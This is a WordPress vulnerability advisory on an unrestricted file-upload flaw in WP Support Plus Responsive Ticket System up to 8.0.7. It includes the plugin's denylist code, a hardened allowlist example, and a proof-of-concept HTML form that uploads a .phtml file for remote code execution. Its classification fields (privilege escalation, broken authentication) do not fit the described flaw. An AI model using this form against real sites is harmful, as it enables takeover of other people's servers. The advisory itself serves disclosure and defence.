WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution

Description
WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are executed as if their extension were ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');
            break;
        // no case for 'phtml', 'php4', 'php5', ...: those extensions are never
        // matched, so the upload proceeds
    }

It does not reject other extensions such as ".phtml". In addition, it saves the file under a predictable name derived from the upload timestamp, so anyone can request the file and run the code it contains.
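The root cause is a denylist: the plugin names the extensions it wants to block and lets everything else through. The safe pattern is the inverse, an allowlist of the extensions the ticket system actually needs, combined with a stored filename that cannot be guessed. The following PHP is an added example of that hardened check, not the plugin's code; the function names, the constant, the allowlist contents and the sample filenames are all assumptions chosen for illustration.

```php
<?php
// Added example (not from the plugin): allowlist-based attachment validation.
// The vulnerable switch above rejects only 'exe', 'php' and 'js'; anything else,
// including .phtml/.php4/.php5/.phar, is accepted. Here we accept only extensions
// we intend to serve and never trust the client-supplied name for storage.

// Hypothetical allowlist; adjust to what the ticket system really needs.
const WPSP_ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt', 'zip'];

function wpsp_is_allowed_attachment(string $originalName): bool
{
    // basename() strips any directory components the client may have sent.
    $name = basename($originalName);

    // Compare case-insensitively: 'photo.JPG' and 'page.PHTML' must be judged
    // the same way as their lowercase forms.
    $segments = array_map('strtolower', explode('.', $name));
    $ext = array_pop($segments);

    // Final extension must be on the allowlist (not merely off a denylist).
    if ($ext === '' || !in_array($ext, WPSP_ALLOWED_EXTENSIONS, true)) {
        return false;
    }

    // Also refuse PHP-looking extensions anywhere earlier in the name
    // (e.g. 'archive.php.txt'); some Apache AddHandler setups match mid-name.
    foreach ($segments as $segment) {
        if (preg_match('/^ph(p\d?|tml|ar|ps)$/', $segment)) {
            return false;
        }
    }
    return true;
}

function wpsp_storage_name(string $originalName): string
{
    // Keep the (already validated) extension, but replace the rest of the name
    // with random bytes so the stored path is not derivable from a timestamp.
    $ext = strtolower(pathinfo(basename($originalName), PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demonstration on constructed sample names.
$samples = ['report.pdf', 'notes.phtml', 'page.php5', 'archive.php.txt', 'photo.JPG'];
foreach ($samples as $sample) {
    $verdict = wpsp_is_allowed_attachment($sample) ? 'accepted' : 'rejected';
    printf("%-16s %s\n", $sample, $verdict);
}
printf("stored as: %s\n", wpsp_storage_name('report.pdf'));
```

Inside WordPress the same result is obtained by routing uploads through wp_handle_upload(), which applies wp_check_filetype_and_ext() against the site's registered MIME list, instead of writing files from $_FILES directly. Independently of the check, the upload directory should be configured so the web server never executes scripts from it, so a single missed extension does not become code execution.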

Plugin author notified 2017-11-09.

Proof of Concept
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

Classification

Type: PRIVESC
OWASP Top 10: A2: Broken Authentication and Session Management
CWE: CWE-269

Miscellaneous

Submitter: Robert Mathews
Submitter Website: https://tigertech.net/
Submitter Twitter: @TigerTech
Verified: No
WPVDB ID: 8948

Timeline

Publicly Published: 2017-11-12
Added: 2017-11-12
Last Updated: 2017-11-12
